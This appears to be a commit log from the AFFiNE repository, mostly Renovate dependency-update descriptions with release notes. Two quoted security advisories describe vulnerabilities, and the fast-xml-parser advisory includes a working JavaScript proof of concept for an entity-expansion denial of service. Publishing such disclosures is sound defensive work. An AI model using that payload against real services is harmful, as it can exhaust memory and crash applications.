![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.61.0` →
`^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.63.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0?slim=true)
|
|
[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.59.0` →
`^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.61.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0?slim=true)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.60.0` →
`^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.62.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0?slim=true)
|
|
[@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fresources/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fresources/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/api)</summary>

###
[`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1)

##### 🐛 (Bug Fix)

- fix: avoid grpc types dependency
[#&#8203;3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551)
[@&#8203;flarna](https://redirect.github.com/flarna)
- fix(otlp-proto-exporter-base): Match Accept header with Content-Type
in the proto exporter

[#&#8203;3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562)
[@&#8203;scheler](https://redirect.github.com/scheler)
- fix: include tracestate in export
[#&#8203;3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569)
[@&#8203;flarna](https://redirect.github.com/flarna)

##### 🏠 (Internal)

- chore: fix cross project links and missing implicitly exported types
[#&#8203;3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533)
[@&#8203;legendecas](https://redirect.github.com/legendecas)
- feat(sdk-metrics): add exponential histogram mapping functions
[#&#8203;3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504)
[@&#8203;mwear](https://redirect.github.com/mwear)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Bug Fixes

- **redis-common:** expand redaction to include ACL, CONFIG, PSETEX,
GETSET
([#&#8203;3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472))
([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.38.2 to ^0.38.3
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.61.0 to ^0.62.0

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.60.0 to ^0.61.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.61.0 to ^0.62.0

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.60.0 to ^0.61.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-19 16:20:32 +08:00
renovate[bot] 0849b342fa chore: bump up dompurify version to v3.4.0 [SECURITY] (#14833)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.3` →
`3.4.0`](https://renovatebot.com/diffs/npm/dompurify/3.3.3/3.4.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.3/3.4.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[GHSA-39q2-94rc-95cp](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp)

## Summary
In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via
`EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to
short-circuit evaluation.

The condition:
```
!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])
```
When `tagCheck(tagName)` returns `true`, the entire condition is `false`
and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.

## Inconsistency
This contradicts the attribute-side pattern at line 1214 where
`FORBID_ATTR` explicitly wins first:
```
if (FORBID_ATTR[lcName]) { continue; }
```
For tags, FORBID should also take precedence over ADD.

## Impact
Applications using both `ADD_TAGS` as a function and `FORBID_TAGS`
simultaneously get unexpected behavior — forbidden tags are allowed
through. Config-dependent but a genuine logic inconsistency.

## Suggested Fix
Check `FORBID_TAGS` before `tagCheck`:
```
if (FORBID_TAGS[tagName]) { /* remove */ }
else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }
```

## Affected Version
v3.3.3 (commit 883ac15)

##### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N`

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.4.0`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.0):
DOMPurify 3.4.0

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.3...3.4.0)

**Most relevant changes:**

- Fixed a problem with `FORBID_TAGS` not winning over `ADD_TAGS`, thanks
[@&#8203;kodareef5](https://redirect.github.com/kodareef5)
- Fixed several minor problems and typos regarding MathML attributes,
thanks [@&#8203;DavidOliver](https://redirect.github.com/DavidOliver)
- Fixed `ADD_ATTR`/`ADD_TAGS` function leaking into subsequent
array-based calls, thanks
[@&#8203;1Jesper1](https://redirect.github.com/1Jesper1)
- Fixed a missing `SAFE_FOR_TEMPLATES` scrub in `RETURN_DOM` path,
thanks [@&#8203;bencalif](https://redirect.github.com/bencalif)
- Fixed a prototype pollution via `CUSTOM_ELEMENT_HANDLING`, thanks
[@&#8203;trace37labs](https://redirect.github.com/trace37labs)
- Fixed an issue with `ADD_TAGS` function form bypassing `FORBID_TAGS`,
thanks [@&#8203;eddieran](https://redirect.github.com/eddieran)
- Fixed an issue with `ADD_ATTR` predicates skipping URI validation,
thanks [@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue with `USE_PROFILES` prototype pollution, thanks
[@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue leading to possible mXSS via Re-Contextualization,
thanks
[@&#8203;researchatfluidattacks](https://redirect.github.com/researchatfluidattacks)
and others
- Fixed a problem with the type dentition patcher after Node version
bump
- Fixed freezing BS runs by reducing the tested browsers array
- Bumped several dependencies where possible
- Added needed files for OpenSSF scorecard checks

**Published Advisories are here:**

<https://github.com/cure53/DOMPurify/security/advisories?state=published>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjAuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMC4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:53:00 +08:00
DarkSky a109f069b0 chore: bump deps 2026-04-10 11:46:14 +08:00
DarkSky c6a99eb9cb chore: bump deps (#14810)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated developer tooling dependencies used for local testing to newer
patch versions for improved stability.
* Bumped backend framework and related packages to newer patch releases
to address fixes and maintain compatibility.
* No functional or public API changes; updates are non-breaking
dependency version bumps.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-09 12:41:38 +08:00
DarkSky fee0cfa3f4 chore: bump deps (#14785)
#### PR Dependency Tree


* **PR #14785** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Updated error-tracking SDK versions across frontend packages.
* Upgraded Electron build toolchain and front-end build plugins for
improved compatibility.
* Replaced a SWC-based React plugin with the standard React Vite plugin.
  * Removed unused development dependencies from CLI tooling.
  * Bumped a Rust workspace dependency to a patch release.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 12:25:18 +08:00
DarkSky ffc27af3ba fix(server): update version check (#14784)
fix #14780


#### PR Dependency Tree


* **PR #14784** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Improved upgrade availability detection to properly compare semantic
versions, including support for prerelease and canary versions. The
system now accurately identifies when new versions are available,
ensuring users receive timely update notifications.

* **Tests**
* Added comprehensive unit tests for version comparison and upgrade
detection functionality.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:56:05 +08:00
DarkSky 5a6c65085a feat(mobile): adapt new endpoint (#14778)
#### PR Dependency Tree


* **PR #14778** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-04 20:39:42 +08:00
DarkSky d3ec008b0c chore: bump deps (#14777)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Migration and config commands now feature interactive prompts for
required inputs.

* **Bug Fixes**
  * Enhanced error handling in CLI operations.

* **Chores**
  * Updated GraphQL Code Generator toolchain to v6.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 19:36:18 +08:00
DarkSky 233004f867 chore: bump oxlint & enable more supported rules (#14769) 2026-04-03 03:36:52 +08:00
DarkSky 91ad783973 fix(test): e2e stability (#14749)
#### PR Dependency Tree


* **PR #14749** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved link preview reliability by updating request identification
to better match modern browsers.
* **Tests**
* Made end-to-end and integration tests deterministic and more robust,
improving AI chat, image generation, attachment handling, settings
visibility, and editor flows.
* **Chores**
* Updated underlying tooling versions to enhance stability and
compatibility.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 23:26:15 +08:00
DarkSky 6a93566422 chore: bump deps (#14690)
#### PR Dependency Tree


* **PR #14690** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated package manager and development tooling to latest compatible
versions.
* Updated backend framework and monitoring dependencies to latest
minor/patch releases.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 05:23:03 +08:00
DarkSky 7ac8b14b65 feat(editor): migrate typst mermaid to native (#14499)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native/WASM Mermaid and Typst SVG preview rendering on desktop and
mobile, plus cross-platform Preview plugin integrations.

* **Improvements**
* Centralized, sanitized rendering bridge with automatic Typst
font-directory handling and configurable native renderer selection.
* More consistent and robust error serialization and worker-backed
preview flows for improved stability and performance.

* **Tests**
* Extensive unit and integration tests for preview rendering, font
discovery, sanitization, and error serialization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:04:40 +08:00
renovate[bot] c1a09b951f chore: bump up fast-xml-parser version to v5.5.6 [SECURITY] (#14676)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser)
| [`5.4.1` →
`5.5.6`](https://renovatebot.com/diffs/npm/fast-xml-parser/5.4.1/5.5.6)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/fast-xml-parser/5.5.6?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/fast-xml-parser/5.4.1/5.5.6?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-33036](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r)

## Summary

The fix for CVE-2026-26278 added entity expansion limits
(`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`,
`maxEntitySize`) to prevent XML entity expansion Denial of Service.
However, these limits are only enforced for DOCTYPE-defined entities.
**Numeric character references** (`&#NNN;` and `&#xHH;`) and standard
XML entities (`&lt;`, `&gt;`, etc.) are processed through a separate
code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to
completely bypass all configured limits, causing excessive memory
allocation and CPU consumption.

## Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

## Root Cause

In `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()`
function has two separate entity replacement loops:

1. **Lines 638-670**: DOCTYPE entities — expansion counting with
`entityExpansionCount` and `currentExpandedLength` tracking. This was
the CVE-2026-26278 fix.
2. **Lines 674-677**: `lastEntities` loop — replaces standard entities
including `num_dec` (`/&#([0-9]{1,7});/g`) and `num_hex`
(`/&#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at
all.**

The numeric entity regex replacements at lines 97-98 are part of
`lastEntities` and go through the uncounted loop, completely bypassing
the CVE-2026-26278 fix.

## Proof of Concept

```javascript
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#&#8203;65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100
```

**Results:**
- 100K `&#&#8203;65;` references → 500,000 char output (5x default
maxExpandedLength of 100,000)
- 1M references → 5,000,000 char output, ~147MB memory consumed
- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K
references produce 50,000 chars
- Hex entities (`&#x41;`) exhibit the same bypass

## Impact

**Denial of Service** — An attacker who can provide XML input to
applications using fast-xml-parser can cause:
- Excessive memory allocation (147MB+ for 1M entity references)
- CPU consumption during regex replacement
- Potential process crash via OOM

This is particularly dangerous because the application developer may
have explicitly configured strict entity expansion limits believing they
are protected, while numeric entities silently bypass all of them.

## Suggested Fix

Apply the same `entityExpansionCount` and `currentExpandedLength`
tracking to the `lastEntities` loop (lines 674-677) and the HTML
entities loop (lines 680-686), similar to how DOCTYPE entities are
tracked at lines 638-670.

## Workaround

Set `htmlEntities:false`

---

### Release Notes

<details>
<summary>NaturalIntelligence/fast-xml-parser (fast-xml-parser)</summary>

###
[`v5.5.6`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/e54155f53048e9d58e27f170d3ccff15176b6671...870043e75e78545192bc70950c6286d36c7cdf23)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6)

###
[`v5.5.5`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/ea07bb2e8435a88136c0e46d7ee8a345107b7582...e54155f53048e9d58e27f170d3ccff15176b6671)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.4...v5.5.5)

###
[`v5.5.4`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...ea07bb2e8435a88136c0e46d7ee8a345107b7582)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.4)

###
[`v5.5.3`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

###
[`v5.5.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...e0a14f7d15a293732e630ce1b7faa39924de2359)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2)

###
[`v5.5.1`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.1):
integrate path-expression-matcher

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.0...v5.5.1)

- support path-expression-matcher
- fix: stopNode should not be parsed
- performance improvement for stopNode checking

###
[`v5.5.0`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...ce017923460f92861e8fc94c91e52f9f5bd6a1b0)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...v5.5.0)

###
[`v5.4.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-18 13:28:53 +08:00
renovate[bot] f537a75f01 chore: bump up file-type version to v21.3.2 [SECURITY] (#14655)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.1` →
